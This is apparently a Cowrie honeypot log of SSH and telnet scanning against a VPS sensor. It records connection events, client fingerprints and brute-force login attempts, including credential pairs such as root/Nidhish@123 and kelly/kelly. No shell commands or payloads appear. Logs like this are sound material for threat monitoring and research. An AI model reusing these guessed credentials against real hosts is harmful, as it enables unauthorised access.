{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:40.356224Z","src_ip":"212.227.235.229","session":"8b03b7f18e38"}
{"eventid":"cowrie.session.connect","src_ip":"184.105.247.252","src_port":36892,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c65482aa0e1","protocol":"telnet","message":"New connection: 184.105.247.252:36892 (1.2.3.4:23) [session: 1c65482aa0e1]","sensor":"my-vps","timestamp":"2025-08-26T18:10:04.012821Z"}
{"eventid":"cowrie.session.closed","duration":1.8572380542755127,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:10:05.869992Z","src_ip":"184.105.247.252","session":"1c65482aa0e1"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.34","src_port":7528,"dst_ip":"1.2.3.4","dst_port":22,"session":"6225904616c1","protocol":"ssh","message":"New connection: 172.104.11.34:7528 (1.2.3.4:22) [session: 6225904616c1]","sensor":"my-vps","timestamp":"2025-08-26T18:10:39.508854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:10:39.854356Z","src_ip":"172.104.11.34","session":"6225904616c1"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:10:39.857862Z","src_ip":"172.104.11.34","session":"6225904616c1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:10:40.950728Z","src_ip":"172.104.11.34","session":"6225904616c1"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.34","src_port":26438,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb824dd3e371","protocol":"ssh","message":"New connection: 172.104.11.34:26438 (1.2.3.4:22) [session: cb824dd3e371]","sensor":"my-vps","timestamp":"2025-08-26T18:10:41.043708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:10:41.559787Z","src_ip":"172.104.11.34","session":"cb824dd3e371"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:10:41.560707Z","src_ip":"172.104.11.34","session":"cb824dd3e371"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:10:42.749236Z","src_ip":"172.104.11.34","session":"cb824dd3e371"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.34","src_port":26446,"dst_ip":"1.2.3.4","dst_port":22,"session":"1840a274e488","protocol":"ssh","message":"New connection: 172.104.11.34:26446 (1.2.3.4:22) [session: 1840a274e488]","sensor":"my-vps","timestamp":"2025-08-26T18:10:42.862142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:10:43.249237Z","src_ip":"172.104.11.34","session":"1840a274e488"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:10:43.250782Z","src_ip":"172.104.11.34","session":"1840a274e488"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:10:44.269572Z","src_ip":"172.104.11.34","session":"1840a274e488"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50772,"dst_ip":"1.2.3.4","dst_port":22,"session":"628661ea9226","protocol":"ssh","message":"New connection: 212.227.235.229:50772 (1.2.3.4:22) [session: 628661ea9226]","sensor":"my-vps","timestamp":"2025-08-26T18:10:51.680038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:10:51.681040Z","src_ip":"212.227.235.229","session":"628661ea9226"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:10:51.914606Z","src_ip":"212.227.235.229","session":"628661ea9226"}
{"eventid":"cowrie.login.failed","username":"kelly","password":"kelly","message":"login attempt [kelly/kelly] failed","sensor":"my-vps","timestamp":"2025-08-26T18:10:52.888491Z","src_ip":"212.227.235.229","session":"628661ea9226"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:10:54.125284Z","src_ip":"212.227.235.229","session":"628661ea9226"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38118,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0914aef38d1","protocol":"telnet","message":"New connection: 212.227.235.229:38118 (1.2.3.4:23) [session: b0914aef38d1]","sensor":"my-vps","timestamp":"2025-08-26T18:11:02.134941Z"}
{"eventid":"cowrie.session.closed","duration":12.524046421051025,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:11:14.658897Z","src_ip":"212.227.235.229","session":"b0914aef38d1"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":36280,"dst_ip":"1.2.3.4","dst_port":22,"session":"f00a680f76dd","protocol":"ssh","message":"New connection: 45.88.8.215:36280 (1.2.3.4:22) [session: f00a680f76dd]","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.001684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.452825Z","src_ip":"45.88.8.215","session":"f00a680f76dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.453525Z","src_ip":"45.88.8.215","session":"f00a680f76dd"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":44702,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bf0911c9fc9","protocol":"ssh","message":"New connection: 139.19.117.131:44702 (1.2.3.4:22) [session: 0bf0911c9fc9]","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.745107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.745924Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.762831Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.798840Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.799504Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.816763Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T18:11:21.817439Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Nidhish@123","message":"login attempt [root/Nidhish@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:11:22.940335Z","src_ip":"45.88.8.215","session":"f00a680f76dd"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:11:23.201524Z","src_ip":"45.88.8.215","session":"f00a680f76dd"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:11:31.745260Z","src_ip":"139.19.117.131","session":"0bf0911c9fc9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62894,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa8eed12f51","protocol":"ssh","message":"New connection: 217.72.205.35:62894 (1.2.3.4:22) [session: 4aa8eed12f51]","sensor":"my-vps","timestamp":"2025-08-26T18:11:46.603230Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:11:46.604717Z","src_ip":"217.72.205.35","session":"4aa8eed12f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42871,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9a430c85eda","protocol":"telnet","message":"New connection: 212.227.125.160:42871 (1.2.3.4:23) [session: c9a430c85eda]","sensor":"my-vps","timestamp":"2025-08-26T18:12:11.568787Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44582,"dst_ip":"1.2.3.4","dst_port":23,"session":"a384e98ba615","protocol":"telnet","message":"New connection: 212.227.235.229:44582 (1.2.3.4:23) [session: a384e98ba615]","sensor":"my-vps","timestamp":"2025-08-26T18:12:25.937113Z"}
{"eventid":"cowrie.session.closed","duration":33.8267822265625,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:12:45.395503Z","src_ip":"212.227.125.160","session":"c9a430c85eda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48314,"dst_ip":"1.2.3.4","dst_port":22,"session":"98dcd5de15fd","protocol":"ssh","message":"New connection: 212.227.235.229:48314 (1.2.3.4:22) [session: 98dcd5de15fd]","sensor":"my-vps","timestamp":"2025-08-26T18:12:56.895515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:12:56.896753Z","src_ip":"212.227.235.229","session":"98dcd5de15fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:12:57.135941Z","src_ip":"212.227.235.229","session":"98dcd5de15fd"}
{"eventid":"cowrie.login.failed","username":"rafael","password":"rafael","message":"login attempt [rafael/rafael] failed","sensor":"my-vps","timestamp":"2025-08-26T18:12:58.125196Z","src_ip":"212.227.235.229","session":"98dcd5de15fd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:12:59.364306Z","src_ip":"212.227.235.229","session":"98dcd5de15fd"}
{"eventid":"cowrie.session.closed","duration":114.87944746017456,"message":"Connection lost after 114 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:14:20.816485Z","src_ip":"212.227.235.229","session":"a384e98ba615"}
{"eventid":"cowrie.session.connect","src_ip":"194.164.107.6","src_port":38314,"dst_ip":"1.2.3.4","dst_port":23,"session":"8206c8612c7d","protocol":"telnet","message":"New connection: 194.164.107.6:38314 (1.2.3.4:23) [session: 8206c8612c7d]","sensor":"my-vps","timestamp":"2025-08-26T18:14:36.998151Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-26T18:14:36.999532Z","src_ip":"194.164.107.6","session":"8206c8612c7d"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T18:14:37.000456Z","src_ip":"194.164.107.6","session":"8206c8612c7d"}
